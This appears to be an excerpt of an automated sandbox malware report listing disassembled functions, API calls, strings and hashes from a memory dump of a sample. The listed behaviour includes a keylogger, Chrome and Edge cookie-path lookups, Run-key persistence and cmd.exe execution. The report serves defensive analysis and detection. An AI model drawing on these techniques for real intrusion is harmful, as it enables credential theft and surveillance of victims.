Uniqueness

Uniqueness Score: -1.00%

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Uniqueness

Uniqueness Score: -1.00%

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Uniqueness

Uniqueness Score: -1.00%

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Uniqueness

Uniqueness Score: -1.00%

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44

Strings

*?, xrefs: 0044E72C
., xrefs: 0044EA0C

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Uniqueness

Uniqueness Score: -1.00%

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 00442400
`#D, xrefs: 004424ED

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
API String ID: 2506810119-4268453932
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
GetLastError.KERNEL32 ref: 0044B931

Strings

PkGNG, xrefs: 0044B821

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: PkGNG
API String ID: 2456169464-263838557
Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

0NG, xrefs: 00404097
/sort "Visit Time" /stext ", xrefs: 004040B2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

!D@, xrefs: 00417089
PG, xrefs: 00416322
okmode, xrefs: 0041630F

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688

Strings

User Data\Profile ?\Network\Cookies, xrefs: 0040C635
User Data\Default\Network\Cookies, xrefs: 0040C603

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757

Strings

User Data\Profile ?\Network\Cookies, xrefs: 0040C704
User Data\Default\Network\Cookies, xrefs: 0040C6D2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

%02i:%02i:%02i:%03i , xrefs: 0041B51E
PkGNG, xrefs: 0041B4EF
| , xrefs: 0041B53C

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i $PkGNG
API String ID: 481472006-3277280411
Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
GetLastError.KERNEL32 ref: 0044C296
__dosmaperr.LIBCMT ref: 0044C29D

Strings

PkGNG, xrefs: 0044C255

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: PkGNG
API String ID: 2336955059-263838557
Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::eofbit set, xrefs: 0040E822
ios_base::failbit set, xrefs: 0040E815
ios_base::badbit set, xrefs: 0040E7EF

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Uniqueness

Uniqueness Score: -1.00%

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,755737E0,?), ref: 0041384D
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,755737E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 1818849710-1051519024
Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

Control Panel\Desktop, xrefs: 00413778, 00413788

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

open, xrefs: 0041612A
cmd.exe, xrefs: 00416125
/C , xrefs: 0041610E

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Uniqueness

Uniqueness Score: -1.00%

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
